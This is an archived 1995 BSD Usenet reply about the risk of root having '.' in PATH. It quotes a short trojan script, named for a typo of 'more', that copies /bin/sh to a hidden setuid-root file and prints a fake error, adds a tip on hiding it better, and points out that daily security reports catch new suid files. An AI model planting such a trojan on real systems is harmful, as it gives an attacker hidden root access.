*BSD News Article 48185


Return to BSD News archive

Path: sserve!euryale.cc.adfa.oz.au!newshost.anu.edu.au!harbinger.cc.monash.edu.au!simtel!zombie.ncsc.mil!news.duke.edu!agate!news.mindlink.net!vanbc.wimsey.com!cynic.portal.ca!curt
From: curt@cynic.portal.ca (Curt Sampson)
Newsgroups: comp.unix.bsd.misc
Subject: Re: running as root with . in path Was: MacBSD ?
Date: 9 Aug 1995 16:01:04 GMT
Organization: Internet Portal Services, Ltd.
Lines: 28
Message-ID: <40am40$hqt@wolfe.wimsey.com>
References: <3vhdsc$a1q@rigel.pixi.com> <id.TO2M1.IPE@nmti.com> <MARKG.95Aug8220219@kelly.teleport.com> <id.44CM1.5RD@nmti.com>
NNTP-Posting-Host: cynic.portal.ca

In article <id.44CM1.5RD@nmti.com>, Peter da Silva <peter@nmti.com> wrote:

>	#!/bin/sh
>	cp /bin/sh /usr/share/man/.man_cache > /dev/null 2>&1 &&
>	chmod 6711 /usr/share/man/.man_cache > /dev/null 2>&1 &&
>	rm mroe &
>	echo 'mroe: Command not found.'

Of course, if the user is using sh instead of csh you want to say
`mroe: Command not found.' Even that's not terribly useful, though
since a sequence like

	# more /etc/passwd
	mroe: Command not found.

looks just a wee bit suspicious. :-) Better would be just to exec the
real command when you're done with your activities.

Also, note that the suid file change should show up in the daily
security report. If odd files are becoming suid root, that's surely
a sign to investigate.

cjs
-- 
Curt Sampson    curt@portal.ca		Info at http://www.portal.ca/
Internet Portal Services, Inc.	
Vancouver, BC   (604) 257-9400		De gustibus, aut bene aut nihil.